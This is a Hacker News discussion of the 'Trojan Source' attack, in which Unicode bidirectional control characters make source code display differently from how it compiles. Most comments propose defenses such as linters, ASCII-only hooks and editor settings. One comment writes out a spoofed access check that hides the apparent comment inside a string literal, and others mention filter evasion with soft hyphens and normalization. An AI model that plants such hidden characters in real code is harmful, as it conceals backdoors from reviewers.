[HN Gopher] 'Trojan Source' Bug Threatens the Security of All Code
___________________________________________________________________
'Trojan Source' Bug Threatens the Security of All Code
Author : picture
Score : 442 points
Date : 2021-11-01 04:24 UTC (18 hours ago)
(HTM) web link (krebsonsecurity.com)
(TXT) w3m dump (krebsonsecurity.com)
| jwilk wrote:
| Another HN discussion:
|
| https://news.ycombinator.com/item?id=29061987
| pabs3 wrote:
| Are there any linters that detect these sorts of issues?
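|
| A minimal sketch of what such a lint check could look like, assuming
| the goal is only to flag the bidirectional embedding, override and
| isolate controls (U+202A..U+202E and U+2066..U+2069). The function
| name find_bidi_controls is hypothetical, not taken from any existing
| linter, and directional marks such as U+200E/U+200F are deliberately
| left out of this sketch.
|
```python
import unicodedata

# Bidirectional control characters that can reorder displayed text:
# embeddings/overrides (U+202A..U+202E) and isolates (U+2066..U+2069).
BIDI_CONTROLS = {
    chr(cp) for cp in (*range(0x202A, 0x202F), *range(0x2066, 0x206A))
}


def find_bidi_controls(source: str):
    """Return (line, column, name) for every bidi control character found."""
    findings = []
    # Split on "\n" only, so line numbers match what most editors show.
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col_no, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append((line_no, col_no, unicodedata.name(ch)))
    return findings
```
|
| A CI step could call this on every changed file and fail the build
| when the returned list is non-empty.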
| marcodiego wrote:
| I thought this was a case of Source code virus[1]. With the
| current popularity of open source and services like github,
| combined with deep inter-dependencies in node.js, a virus of this
| kind could have a huge impact if unnoticed for long enough.
|
| Maybe it is the next plague waiting to happen?
|
| [1] https://en.wikipedia.org/wiki/Source_code_virus
| qwerty456127 wrote:
| Although I'm not a native English speaker, and I meant almost all
| the programs I ever wrote to be capable of processing any given
| language (and also to have localized UIs in some cases), I see no
| reason for non-English strings to be allowed in source code and
| code files, except in some ad-hoc scripts where hard-coding some
| text can be the optimal solution.
|
| We probably just need a git switch which would make it throw an
| error if it encounters Bidi or any weirdness like that except in
| resource files.
| mkl wrote:
| Non-English characters are quite useful in comments where
| you're explaining Unicode processing stuff, and in regexes
| working with the characters, and when you're using maths
| notation (proper symbols in comments, Greek letters for
| variables, etc.), and when you're drawing boxes in a terminal.
| I'm sure there are many more too.
| qwerty456127 wrote:
| I omitted this to keep it simple (this is why I wrote non-
| English rather than non-ASCII, I actually am a proponent of
| active usage of proper Unicode symbols like =, [?], etc, and
| also TUIs) but yes, I would prefer a rather extended English
| char-set including Greek letters, mathematical symbols,
| pseudographics etc. These can be useful and are not much
| trickier than English letters. But I would certainly like to
| see at least a warning (I would even prefer an Error
| actually) if my code file includes anything related to RTL,
| complex character composition or non-Latin letters other than
| Greek.
| samus wrote:
| Since most programming languages are based on English,
| non-English text in string literals is almost always user-facing
| and should be put in resource files to make translation into
| additional languages easier.
|
| Identifiers and comments are a serious problem though. Many
| application domains use terms that are tricky to translate into
| English. The translations could be misleading, inappropriate or
| not unique. Sometimes they are just plain wrong or there is no
| English word that fits. All of these could cause
| misconceptions, confusion and bugs, and make reading and
| working with the code and the running system harder.
| qwerty456127 wrote:
| So you mean you can write a program and be unable to explain
| what it does in plain English?
| josephcsible wrote:
| > Many application domains use terms that are tricky to
| translate into English.
|
| What if instead of translating those terms to English, you
| just transliterated them to the Latin alphabet?
| dwheeler wrote:
| As I previously noted on a related post:
|
| Interesting paper. Note, however, that the general problem is
| already known and there are a number of pre-existing works that
| discuss it. This is typically called "underhanded code" or
| sometimes "maliciously misleading code". I'm surprised that they
| didn't use the normal term for the problem nor cite the previous
| work on it - maybe they didn't realize this was a widely-known
| problem? Previous works on underhanded code didn't discuss Bidi
| to my knowledge (though other attacks on text like this have
| exploited Bidi). Here are a number of other materials about
| underhanded code:
|
| The Obfuscated V Contest
| (http://graphics.stanford.edu/~danielh/vote/vote.html) was
| created by Daniel Horn in 2004 and is the earliest "underhanded"
| programming contest that I found. It was a contest to create
| source code that looked like it did one thing, but actually did
| another.
|
| Underhanded C Contest (http://www.underhanded-c.org/) has run in
| many years. Per its FAQ, "The Underhanded C Contest is an annual
| contest to write innocent-looking C code implementing malicious
| behavior."
|
| My PhD dissertation "Fully Countering Trusting Trust through
| Diverse Double-Compiling" discusses how to counter the "trusting
| trust" problem & includes a section about maliciously misleading
| source code. See: https://dwheeler.com/trusting-trust/
|
| The JavaScript Misdirection Contest announced the winner on
| September 27, 2015 http://misdirect.ion.land/
|
| My paper "Initial Analysis of Underhanded Source Code", (by David
| A. Wheeler, April, 2020, IDA document: D-13166), discusses
| underhanded code and the effectiveness of several potential
| countermeasures. It also includes a number of citations to other
| works on underhanded code. https://www.ida.org/research-and-
| publications/publications/a...
| kfichter wrote:
| First place winner of last year's underhanded Solidity contest
| used exactly this trick:
| https://blog.soliditylang.org/2020/12/03/solidity-underhande...
| axic wrote:
| There was a related issue in 2018 regarding line endings, which
| allowed some lines to be disguised as code while they were still
| treated as comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWC
| gXqLnw8FN...
|
| Both of these were fixed in Solidity shortly after the bug
| reports.
|
| (P.S. I'm a member of the Solidity team)
| taviso wrote:
| It's also worth noting that if you're caught playing games like
| this, there is really no way to explain your actions that would
| avoid serious consequences.
|
| If however, you used the "bugdoor" method, you can plausibly
| deny any malicious intent and you will absolutely get away with
| it.
| ChrisMarshallNY wrote:
| Looks like avoiding dependencies and snippets is a good way to
| mitigate this.
|
| In my own work, I use almost no dependencies (aside from
| compilers and built-in APIs). Scratch that. I use a _lot_ of
| dependencies, but ones that I have written, and generally rewrite
| snippets, when I use them.
|
| Also, very little of the code I see, has comments.
|
| Like, _any_ comments; even headerdoc comments.
|
| _> Green said the good news is that the researchers conducted a
| widespread vulnerability scan, but were unable to find evidence
| that anyone was exploiting this. Yet._
|
| ... "yet" ...
|
| I know that I'm a "dependency curmudgeon," but stuff like this
| just serves to reinforce my posture.
| Cthulhu_ wrote:
| But what if this is slipped into your compiler? Your operating
| system's kernel? A top voted Stack Overflow answer? You can't
| (or it's infeasible to) check and control everything.
| _3u10 wrote:
| Yes, you're totally safe then. I've never heard of standard
| libraries having problems that affect security, certainly not
| the str* family of functions.
| ChrisMarshallNY wrote:
| Any particular reason for the nasty? I thought we didn't do
| that kind of thing, around these parts, but I'm often wrong.
| _3u10 wrote:
| The pain of having worked under these conditions of not
| using libraries, usually having to work with subpar
| libraries that were developed internally.
|
| Like oh, hey, we need a database, great, let's roll our own.
| Or the ancient version of whatever lib shipped with the OS
| that is full of bugs solved in subsequent versions.
|
| I see that you now use a lot of dependencies, and retract
| my statement.
| ChrisMarshallNY wrote:
| sigh...Why does it have to be "all or nothing"? These logical
| fallacies are pretty much a standard in these discussions.
|
| Either have 100%, ironclad security, or "Who cares? YOLO! STDs
| be damned" abandon?
|
| We do what we can to make sure what _we_ write is as good as
| possible.
|
| I lock my car door, when I get out. I know that it won't stop a
| determined thief, but it will avoid problems from the casual
| knucklehead.
| WalterBright wrote:
| Homoglyphs are a disaster and should never have been admitted
| into Unicode. There should never have been invisible semantic
| information embedded in Unicode.
| josephcsible wrote:
| Why is bidirectionality handled when text is being rendered onto
| the screen, instead of when it's being input from the keyboard?
| Why not render every single character in LTR order, and have RTL
| support instead be handled by text input fields moving the cursor
| in the opposite direction after each RTL character is typed? (I
| know it's too late to change this now. I'm asking why we didn't
| do it this way from the beginning.)
| jart wrote:
| If I understand correctly, what you're suggesting could be
| thought of as pre-rendering directionality into the memory
| layout. If we did that then it might compromise our ability to
| write an algorithm that iterates over a string of hebrew or
| arabic characters. Display is super complicated and people
| don't agree on how to do it. For example, consider the arabic
| text `wd@ 'bw tyh. If I sneak a latin A between all those
| characters to prevent the display algorithm from rearranging
| and shaping them, then that same string looks like this:
| `AwAdA@A'AbAwAtAAyAh. Those are the same characters and you can
| confirm that yourself using: for c in '`wd@
| 'bw tyh': print(unicodedata.name(c))
|
| On the other hand if you want to romanize that string as EWDTA
| AEBW TAIH then all you need is a for loop and a switch
| statement, because the memory order is always left to right. We
| can also rest assured that if someone invents a better display
| algorithm, we won't need to do any database migrations, since
| the encoding itself doesn't need to change.
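|
| The point about memory order can be sketched as follows. The four
| letters below (AIN, WAW, DAL, TEH MARBUTA) are an assumption chosen
| to match the "EWDTA" romanization quoted above, since the original
| Arabic text did not survive extraction intact, and the ROMAN table
| is a hypothetical mapping for illustration only.
|
```python
import unicodedata

# Four Arabic letters written as escapes, so this listing itself
# contains no right-to-left text: AIN, WAW, DAL, TEH MARBUTA.
word = "\u0639\u0648\u062f\u0629"

# Hypothetical romanization table, for illustration only.
ROMAN = {"\u0639": "E", "\u0648": "W", "\u062f": "D", "\u0629": "TA"}

# Iteration follows logical (memory) order, regardless of how a
# renderer would lay the letters out on screen.
names = [unicodedata.name(c) for c in word]
romanized = "".join(ROMAN.get(c, c) for c in word)

# Interleaving a Latin letter changes only how the text is displayed;
# the Arabic code points stay the same and stay in the same order.
interleaved = "A".join(word)
```
|
| Because the loop never consults display order, the same code keeps
| working if the rendering algorithm changes.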
| swiftcoder wrote:
| If you have a document with mixed languages, you need to be
| able to edit each language in its natural direction after the
| fact. That requires storing directionality in the document.
|
| And keep in mind that if you store RTL text backwards, as you
| propose, every algorithm now has to be able to process
| backwards text. Backwards spellcheck is a lot of extra work...
| laurowyn wrote:
| Because visual representation is separate from the underlying
| data structure. A string container doesn't have a specific
| direction, only a relative one. I.e. This character comes
| before the next and after the previous. Adding the bidi control
| code, the string indicates when the visual ordering changes in
| this relative direction system.
|
| You could absolutely design a new string container that assumes
| left to right at all times and cannot be changed, but then it's
| on the programmer to ensure that strings are copied or
| concatenated in the right direction, at the right location, and
| substring searching becomes a minor headache. How would you
| concatenate an RTL string to a forced LTR string
| representation? You would have to work out whether the end of
| the string is LTR or RTL. If LTR, append directly. If RTL, find
| the character where the direction changes and insert the string
| in there - much more expensive. Better to just append the
| string, using bidi codes where required, and let the frontend
| process the string to make the appropriate direction changes.
| Yes, you may need to search the string for the bidi code to
| know which direction you're going at the end of the string, but
| that's just a simple reverse string search for a single control
| character, and not a complex variable multi-byte search of
| inferred character directions by codepoint values.
|
| I think the issue is in the locations in which bidi codes are
| rendered. They give an inherent untrustworthiness to the
| text area they're rendered in, and so should be treated as an
| exception in critical situations. I've seen the reversed exe
| file name trick used for years, and every time I ask myself why
| that's even a thing? If the OS used file headers and magic
| numbers to determine file types instead of the filename, it
| would be less of an issue.
|
| For source code, I would question the rendering of RTL text in
| a source code editor as it's an obvious issue for code safety.
| Ideally, all source code would be kept to the same origin
| language - doesn't have to be english, just consistent. Any
| non-conforming text should ideally be loaded from a resource
| rather than inline within the source code, to avoid foreign
| character contamination and allow easier identification of
| these issues. Further, source code rendering should only render
| identified safe control codes, and treat unsafe ones as raw
| binary values to be shown as such - i.e. \r and \n are safe, \b
| is unsafe, and bidi codes would also be unsafe. You could even
| go so far as to include them in the syntax highlighting, but
| that results in a dependency on syntax highlighting to show the
| semantics of the source code rather than the text alone.
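|
| A rough sketch of the "show unsafe control codes as raw values" idea,
| assuming that newline, carriage return and tab are the only controls
| treated as safe (tab is an addition not named above). The function
| name show_controls is hypothetical. Note that the Cf category also
| covers characters with legitimate uses, such as zero-width joiners,
| so a real editor would probably want a narrower list.
|
```python
import unicodedata

# Controls that are rendered normally (an assumption of this sketch).
SAFE_CONTROLS = {"\n", "\r", "\t"}


def show_controls(text: str) -> str:
    """Replace control and format characters with a visible <U+XXXX> tag."""
    out = []
    for ch in text:
        # Cc = control characters (e.g. backspace),
        # Cf = format characters (includes the bidi controls).
        if ch not in SAFE_CONTROLS and unicodedata.category(ch) in ("Cc", "Cf"):
            out.append(f"<U+{ord(ch):04X}>")
        else:
            out.append(ch)
    return "".join(out)
```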
| [deleted]
| malf wrote:
| Flip left and right in your idea, and you can try it out
| without learning a new language. Remember to implement word
| wrap.
| fullstackchris wrote:
| I fail to see how this can actually be used as an exploit. As
| some commenters have said, yes, it may be a risk to some open
| source tools where there is poor due diligence in the merge
| request review process - but that is almost never the case.
|
| Otherwise, if you own your own code, this obviously isn't an
| issue. (Unless, of course, for some reason you want to program
| exploits into software at your organization :) )
|
| Heck, even GitHub already shows a warning for files that have bi-
| directional unicode...
|
| A bit of an overemotional title if you ask me.
| pietroalbini wrote:
| It's this research that prompted GitHub to show warnings, they
| didn't appear as of yesterday.
| willvarfar wrote:
| https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a
| nice clear example.
|
| Full Stack Chris reviews some code that he thinks says:
| if access_level != "user" { // Check if admin
|
| This may be an open source project. This may be an internal bad
| egg (a very common threat; insider jobs are actually one of the
| absolute top risks to a company). Or this code may be injected
| by an attacker who has gained access to the repo and is leaving
| backdoors that they hope to survive long after their access is
| blocked or leaving backdoors to make deployed production
| systems vulnerable. Etc.
|
| And Chris won't notice that the computer will execute:
| if access_level != "user{U+202E} {U+2066}// Check if
| admin{U+2069} {U+2066}" {
|
| This is not just an attack on compiled languages. Scripting
| languages are just as vulnerable.
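|
| To make the difference concrete, here is a small sketch that writes
| the second snippet's string literal with explicit escapes and compares
| it with what the reviewer believes it to be. The variable names are
| illustrative only.
|
```python
# The string literal the compiler actually sees in the second snippet,
# with the invisible characters written as escapes.
literal = "user\u202e \u2066// Check if admin\u2069 \u2066"

# What a reviewer believes the literal to be.
believed = "user"

# The comparison in the reviewed code is against `literal`, not "user".
is_same = literal == believed

# Code points of the invisible characters hidden inside the literal.
hidden = [f"U+{ord(c):04X}" for c in literal if ord(c) > 0x7F]
```
|
| Here is_same is False: the apparent comment is part of the string, so
| the check compares access_level against something no real value will
| ever equal.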
| kiklion wrote:
| Sorry, still don't get it.
|
| Isn't the issue that they are using magic strings? If the
| strings were something like RoleConstants.Admin then this is
| avoided?
|
| Though I don't understand the point of the Unicode characters
| in the comment string so I must be missing something.
| tzs wrote:
| > Though I don't understand the point of the Unicode
| characters in the comment string so I must be missing
| something.
|
| There is no comment string.
| kiklion wrote:
| So after reading other parts, I get where I was mistaken
| but still believe proper coding practices of avoiding
| magic strings would avoid many of the potential issues.
|
| My mistake was thinking the initial Unicode character was
| changing the comparison string similar to a non printable
| character could. But instead it flips the ordering so
| that the comment is part of the comparison string and
| then the string is terminated.
| sethammons wrote:
| And the dev wrote test cases (negative ones too!). The test
| fails and shows admin privileges for the normal user.
| Debugging ensues. I'd hope.
| wizzwizz4 wrote:
| The test has the same kind of change. It passes, and nobody
| thinks to look at the obviously-correct code.
| throw10920 wrote:
| Or, hear me out - instead of trying to work around a legitimate
| _feature of Unicode_, you could stop _storing your source code
| as text_, because it _isn't_. _Code is not text_ - it's a tree
| of objects, and representing it as a flat sequence of text
| characters causes _many_ problems and inefficiencies (including
| this one!) that could be mitigated if you _just stored and
| manipulated it as a tree_.
|
| The only reason why text was justifiable as a storage and
| manipulation format for code in the first place was because early
| computers (probably?) couldn't handle a tree format. That excuse
| has been invalid for several decades now, as is the idea that
| "everything is plain text". Code _isn't_ plain text - if it was,
| then you could make arbitrary edits without syntax errors, but
| you can't, because code has _structure_. Start treating it that
| way.
| shaunxcode wrote:
| Yes! This would also do away with a whole class of conflicts
| related to whitespace/formatting.
| throw10920 wrote:
| Exactly! Imagine a version control system where you get diffs
| on the AST tree, instead of the characters that make up the
| source (add an `if` and suddenly dozens of lines have
| "changed"), or the tabs/spaces flamewar evaporating
| instantly.
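|
| As a small illustration of comparing trees rather than characters,
| the sketch below uses Python's standard ast module. It is only an
| analogy for the idea above, not a version control system: same_tree
| is a hypothetical helper, and comments are simply dropped by the
| parser.
|
```python
import ast

original = "if x:\n    y = 1\n"
# Same program, different indentation, spacing and an added comment.
reformatted = "if x:\n        y   =   1   # reformatted\n"
# A real change: the assigned value differs.
changed = "if x:\n    y = 2\n"


def same_tree(src1: str, src2: str) -> bool:
    """Compare two sources by syntax tree, ignoring layout and comments."""
    # ast.dump omits line/column attributes by default, so only the
    # structure of the tree takes part in the comparison.
    return ast.dump(ast.parse(src1)) == ast.dump(ast.parse(src2))
```
|
| With these inputs, same_tree(original, reformatted) holds while
| same_tree(original, changed) does not.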
| scintill76 wrote:
| Also helps with naming. Only need a value once or twice? Don't
| bother trying to name it, just link it into the tree where it's
| needed.
| rocqua wrote:
| The thing about text is that it is barebones. Everyone can
| agree what the structure of text is (a stream of bytes with
| some ascii like encoding).
|
| For representing code as more than text, you will lose so many
| tools that can handle your code, it's a massive setback. Add
| to that how much effort it takes to get people onboarded on
| your new representation, and things look bleak for adoption.
|
| Finally, programmers really like looking under the hood. And
| with plain text, you know exactly what your code looks like in
| bytes.
| throw10920 wrote:
| > The thing about text is that it is barebones.
|
| That's a bug. Programming is _hard_, and you want the best,
| most powerful tools to handle it as you can - which means
| putting effort into making _specialized_ tools instead of
| using generic ones like text editors.
|
| > For representing code as more than text, you will lose so
| many tools that can handle your code, it's a massive
| setback.
|
| _No_ tools existed without first being built, so this isn't
| special. Rust didn't have any tools before people started
| building tools for it, for instance.
|
| Moreover, the tools that we have now that are text-specific
| are _pathetic_. You can view the first _n_ lines of a file?
| Wow, very impressive /s. More complex things like grep are
| just as realizable in a structure editor, and in order to use
| them for non-trivial stuff, you'd have to write structural
| regular expressions and implement mini-parsers _anyway_ -
| things you would get for free if you just kept code as
| structure.
|
| > Add to that how much effort it takes to get people
| onboarded on your new representation, and things look bleak
| for adoption.
|
| You're misreading my argument. I'm not saying that people
| _will_ adopt structured code (a descriptive statement), I'm
| saying that people _should_ adopt structured code (a normative
| statement) because it'll be much better for them.
|
| Also, you're making the assumption that onboarding is hard,
| and that compatibility layers can't exist - neither of which
| is true.
|
| > Finally, programmers really like looking under the hood.
| And with plain text, you know exactly what your code looks
| like in bytes.
|
| The average programmer probably looks at their code with a
| hex editor once in their life - this isn't really a good
| argument. Moreover, the vast majority of programmers already
| tolerate _not_ looking under the hood in dozens of different
| ways - most use VMs like CPython/JVM/JS VMs, opaque
| frameworks like React/Angular, graphics APIs like
| OpenGL/DirectX/Vulkan, complicated editors like Visual Studio
| Code/Emacs, and far more without ever looking under the hood
| of _any_ of those - so there's no reason to not add another
| layer (especially because you can build that layer to be easy
| to peer through) for the sake of productivity.
| ziml77 wrote:
| Would the solution to this be to render the direction switch
| control character similar to how some text editors will render 0
| bytes as a glyph with the text NUL? You could still render
| everything after it with the reversed direction, but it provides
| a visible indicator that it's been done. It might be a little
| annoying for people who use RTL languages, but it seems like the
| benefit may outweigh that.
| simmo9000 wrote:
| Here is an example, open it in an appropriate editor (vi) and you
| can see how easy it is to 'exploit' (if you can call it that?).
|
| https://github.com/nickboucher/trojan-source/blob/main/JavaS...
|
| Seems like a layer 8 problem?
| brundolf wrote:
| GitHub has already updated their UI I see
| techsolomon wrote:
| Changelog - https://github.blog/changelog/2021-10-31-warning-
| about-bidir...
| Groxx wrote:
| The Android app renders it much more suspiciously too, though
| unfortunately no warning: https://imgur.com/a/L3sNFQ8
| Semaphor wrote:
| In case there are people who (currently) don't have access to
| such an editor, here is a screenshot:
| https://i.imgur.com/2Ue2Vvd.png
| siddhesh wrote:
| You mean, like this?
|
| https://imgur.com/a/unKuOoK
|
| Snark aside, most text based editors have some giveaway or
| another. Even the GUI ones show syntax highlighting quirks that
| show that something is wrong.
|
| This is only really relevant in unicode-aware terminals,
| without syntax highlighting and when you don't get to scroll
| between characters. IOW, it's really quite hard to do.
| z29LiTp5qUC30n wrote:
| The bootstrappable community already produced a solution for
| this:
| https://github.com/oriansj/stage0/blob/master/High_level_pro...
| samus wrote:
| It may be worth taking a step back and a fresh look at the
| underlying problem.
|
| Source code combines multiple kinds of text. There are
|
| * hierarchical structure,
|
| * mathematical and logical syntax
|
| * literals (especially insidious: text)
|
| * free text in comments and
|
| * markup in documentation
|
| These newly discovered vulnerabilities remind me of the issue of
| SQL injection, which is also caused by a confusion when combining
| these kinds of text.
|
| For SQL injection, the solution was to introduce facilities to
| explicitly combine SQL syntax and dynamic literals. Maybe we need
| something similar for code that enforces such strict separation.
| Maybe into different files or nested into a container format.
| There are already facilities for doing so (resource files,
| templating languages) but they are opt-in and don't go far enough
| to address the newly discovered problems.
|
| The cost would be that code could become more difficult to edit
| with plain-text editors.
| pdonis wrote:
| This article talks about compilers, but what about interpreted
| languages like Python or Lisp?
| metroholografix wrote:
| Emacs "fix": (setq bidi-display-reordering nil) in relevant
| modes.
| perihelions wrote:
| I forced it globally, are there reasons that's bad to do?
| (setf (default-value 'bidi-display-reordering) nil)
|
| The BIDI issue looks pretty bad in emacs-gtk: the sneaky text
| is unnoticeable in lots of modes, unless the cursor just
| happens to scroll over it.
| josephcsible wrote:
| Why did you put "fix" in quotes? Isn't that an actual fix for
| this?
| cestith wrote:
| It's more of a workaround that breaks things for people
| legitimately using RTL strings isn't it?
| zeepzeep wrote:
| The good old SexyHexe.pdf strikes again.
|
| These problems won't go away for a while, unicode is fucking
| hard. Almost every app I ever tried it on had at least some
| problems with %u202E (the right-to-left override).
| jeroenhd wrote:
| It all depends on your IDE. I've tried this, and IntelliJ and
| friends will show a little block with the text RLO for the
| right-to-left override or ZWS for zero-width space for any
| non-standard character that might mess things up. (Neo)vim will
| show the Unicode escape sequence instead of rendering the text as
| Unicode directs it.
|
| Some compilers, notably clang, will warn you that you're using an
| "invisible character". Assuming you at least read the warnings
| your code generates (because if you don't, why not just put
| exploitable algorithms deep down in the software?) you'd probably
| catch the issue.
|
| Simpler programs such as the text editor that ships with GNOME
| will freak out, but I don't think most people are coding in that
| in the first place.
|
| I think this is an interesting peculiarity, but it's not a
| "threat" to "the security of all code".
| [deleted]
| aulin wrote:
| I'd say that neovim is bugged here and gedit is the one working
| properly rendering unicode as it should be
| tannhaeuser wrote:
| That Unicode with its extremely large character set would become
| a solution to any and all character encoding problems in itself
| was never the case. Usually, for a given document you'll want to
| declare the subset that's actually in use such that a particular
| font with necessarily limited coverage can be used to render it.
| That's what's available for SGML markup documents eg in an SGML
| declaration, where you can declare and construct a document
| character set from planes or arbitrary code point ranges, and an
| SGML parser can verify actual content against that subset.
| froh wrote:
| Was that capability dropped in the transition from sgml to XML?
| If so, can someone here on HN provide some pointers to the old
| discussion?
| tannhaeuser wrote:
| All discussion related to creating XML as an SGML subset can be
| found on the xml-dev mailing list [1], with some earlier
| discussions and initial drafts of the SGML ERB mostly linked
| from there.
|
| The capability to declare document character sets was dropped
| along with supporting an SGML declaration altogether.
|
| [1]: http://lists.xml.org/archives/xml-dev/
| Gunax wrote:
| I am still confused. Is the text not visible?
|
| If I write some text in a comment, it should still be visible,
| regardless of direction/bidi code, right?
| aww_dang wrote:
| I filed this domain away under 'security alarmist nonsense' years
| ago. This headline and story are prime examples of the form.
| sydthrowaway wrote:
| Seriously. State run espionage is 100x more likely
| mmastrac wrote:
| Fun story: I discovered these in the early 2000s and
| simultaneously discovered that Slashdot didn't filter these out.
| I spent an evening randomly reversing large sections of comment
| pages until they finally blocked it.
|
| I'm very, very sorry CmdrTaco.
| kingcharles wrote:
| Most web sites' comment sections will allow these. I think even
| Facebook allows tomfoolery like this.
| fear the utf8man [in the original, each letter carries a stack
| of combining diacritics]
| Cthulhu_ wrote:
| I've seen some sites / services (Discord?) filter these out,
| at least to the point where they don't escape a message's
| vertical space. I'm sure they're truncated because those
| messages are pretty big in terms of amount of bytes.
|
| And while they have valid use cases, I can't see it in e.g.
| comment sections or chat messages. Happy to have someone link
| to e.g. a Vietnamese comment section showing practical use
| though.
| Timwi wrote:
| Vietnamese Wikipedia has plenty of Talk pages with
| discussion threads.
| scatters wrote:
| Well yes, Facebook has users in Vietnam. Stacked diacritics
| are a feature, not a bug.
| SavantIdiot wrote:
| This exploit requires comments.
|
| I think most code is safe.
| pweezy wrote:
| It's not the same thing, but brings to mind Ken Thompson's famous
| "Reflections on Trusting Trust" [0] from 1984.
|
| That describes a concept, over several stages, where a compiler
| can be made to change the behavior of programs it compiles in a
| difficult-to-find way.
|
| [0]:
| https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
| kens wrote:
| This reminds me of a trick you could do on the Commodore PET in
| the 1980s, where you'd embed backspaces in your BASIC code. If
| someone looked at the code they'd see something different from
| what gets executed. Effective to keep someone from copying your
| code in class :-)
| TruthWillHurt wrote:
| Is this a real cause for concern? Simply don't copy code with
| strange unicode characters, just like you don't copy code with
| blocks of bytecode.
| mkl wrote:
| The point of the vulnerability is that you can't necessarily
| see the strange Unicode characters.
| samus wrote:
| It's a problem in any environment where people can input
| Unicode characters. Reviewers might use tools that are not able
| to see those things.
|
| At the same time, one can't just put a blanket ban on Unicode.
| It exists for a reason. People _want_ to use their native
| languages to name identifiers, or at least to write comments.
| Restricting ourselves to ASCII again and thus forcing English
| on everybody is not a solution.
| lixtra wrote:
| > Restricting ourselves to ASCII again and thus forcing
| English on everybody is not a solution.
|
| Yet most programming languages force them to use English
| Arabic numbers.
|
| Wouldn't it be great to use Roman numerals?
|
| And then images in source code are really difficult to
| handle. Wouldn't it be nice to compile a word document with
| embedded images?
|
| I think I wouldn't mind staying with ASCII for source code,
| except for string literals (difficult enough).
| TacticalCoder wrote:
| Honest question: would it be _that_ bad to mandate and enforce
| 100% ASCII source files? Arguably every and any Unicode character
| and, well, arguably even any string of characters can (should?)
| go to a properties/resources file (properties/resources files
| which, btw, also greatly simplify i18n/l10n).
|
| Then build/commit/test hooks could be used to enforce that source
| code files are indeed 100% ASCII.
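|
| A minimal sketch of the check such a hook could run, assuming the
| file has already been read and decoded into a string. The function
| name non_ascii_report is hypothetical, and wiring it into an actual
| git hook or CI job is left out.
|
```python
def non_ascii_report(source: str):
    """Return (line, column, code point) for every non-ASCII character."""
    report = []
    # Split on "\n" only: str.splitlines() would also split on (and
    # thereby hide) non-ASCII separators such as U+2028.
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col_no, ch in enumerate(line, start=1):
            if ord(ch) > 0x7F:
                report.append((line_no, col_no, f"U+{ord(ch):04X}"))
    return report
```
|
| A hook would reject the commit whenever the report for any source
| file is non-empty, while leaving resource files out of the scan.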
|
| I know, I know... Some are going to lament they don't have their
| shiny Unicode symbols right in their source file. But... It looks
| like you get what you pay for.
|
| Bruce Schneier wrote it when Unicode came out btw: _"Unicode is
| too complex to ever be secure"_.
| EamonnMR wrote:
| Having readable unicode in string literals is nice.
| thereddaikon wrote:
| Seems the bigger complaint isn't the lack of fancy Unicode in
| comments, it's that non-English speakers with non-Latin
| alphabets won't be able to comment in their native language.
|
| I'll leave it up to others to discuss how important this is or
| isn't.
| Jeff_Brown wrote:
| > Bruce Schneier wrote it when Unicode came out btw: "Unicode
| is too complex to ever be secure".
|
| It's astounding to me that there's room for such complexity in
| it. I thought it was just a lot of symbols. What other rules
| does Unicode have besides changing the order sometimes?
| ncc-erik wrote:
| The one a lot of folks know about was the soft hyphen
| (U+00AD) to bypass swear filters. I was able to use
| normalization to create XSS attacks.
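|
| The comment does not say how those attacks worked. One commonly
| described pattern, sketched here as an assumption, is a filter that
| inspects the input before it is normalized. The naive_filter_blocks
| function is a hypothetical stand-in for such a filter.
|
```python
import unicodedata


def naive_filter_blocks(text: str) -> bool:
    """Hypothetical filter: rejects input containing an ASCII '<'."""
    return "<" in text


# Fullwidth '<' (U+FF1C) and '>' (U+FF1E) slip past the filter...
payload = "\uff1cscript\uff1e"
passes_filter = not naive_filter_blocks(payload)

# ...but NFKC normalization later folds them to their ASCII forms.
normalized = unicodedata.normalize("NFKC", payload)

# A soft hyphen (U+00AD) splits a word for substring matching while
# usually staying invisible on screen.
evades_word_list = "badword" not in "bad\u00adword"
```
|
| Normalizing first and filtering second closes the first gap; the soft
| hyphen has to be stripped separately, since NFKC leaves it in place.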
| supperburg wrote:
| How dare you suggest something sensible. The mob will soon be
| knocking at your door.
| InfiniteRand wrote:
| Might be nice to have an easy tool to scan files and whitelist
| characters from specific alphabets, because in most
| international teams I think you'll have a common language for
| comments, and so I think it's unlikely that you'll need say
| European and Indic and Chinese characters in one code base.
| Except the one pain point I can see - @author annotations in
| the source code, if you have an international team you might
| end up with a variety of scripts in that field, in my mind
| that's something that can be lived without, but I can imagine
| some people being sensitive about that.
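|
| A small sketch of such a scanner. Python's standard library has
| no script property, so this approximates the script by the
| first word of the Unicode character name, which is a heuristic
| and an assumption of this example. ALLOWED_SCRIPTS, script_of
| and disallowed are hypothetical names.

```python
import unicodedata

ALLOWED_SCRIPTS = {"LATIN"}  # hypothetical per-project policy


def script_of(ch):
    """Approximate a character's script by the first word of its Unicode name."""
    if ch.isascii():
        return "LATIN"  # treat all of ASCII as allowed
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def disallowed(text, allowed=ALLOWED_SCRIPTS):
    """Return sorted (codepoint, script) pairs for characters outside the policy."""
    return sorted({(f"U+{ord(ch):04X}", script_of(ch))
                   for ch in text if script_of(ch) not in allowed})


# U+00E9 is a Latin letter with an accent; U+0435 is a Cyrillic lookalike of "e".
print(disallowed("caf\u00e9 us\u0435r"))
```

| A team commenting in Greek or Hebrew would extend the allowed
| set with those names rather than turning the check off.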
| dotancohen wrote:
| Though I comment source in English, lots of people that I work
| with comment in other languages. Including Hebrew, from right to left.
| SavantIdiot wrote:
| Wouldn't simply stripping comments before doing any other
| processing solve the problem? I know there are plenty of
| programs that sprinkle code into comments, from Emacs to
| linters. Or is this obviously naive?
|
| Seems to me that if you need to put code in the comments,
| you've got a bigger problem. I know people like tab hints and
| lint overrides, but maybe it is time to focus on separation of
| concerns at a higher level?
| sfgweilr4f wrote:
| Give it a few years and unicode will probably be turing-
| complete. For reasons... likely not good ones though.
| wizzwizz4 wrote:
| Unicode rendering already requires multiple finite state
| machines.
| btbuildem wrote:
| That was my first thought -- run all your source through an
| ASCII-only filter, the problem goes away.
| iforgotpassword wrote:
| For projects like the Linux kernel this should be absolutely
| feasible. A few names in headers get mangled and lose their
| accents but that should be acceptable. Other projects... Well
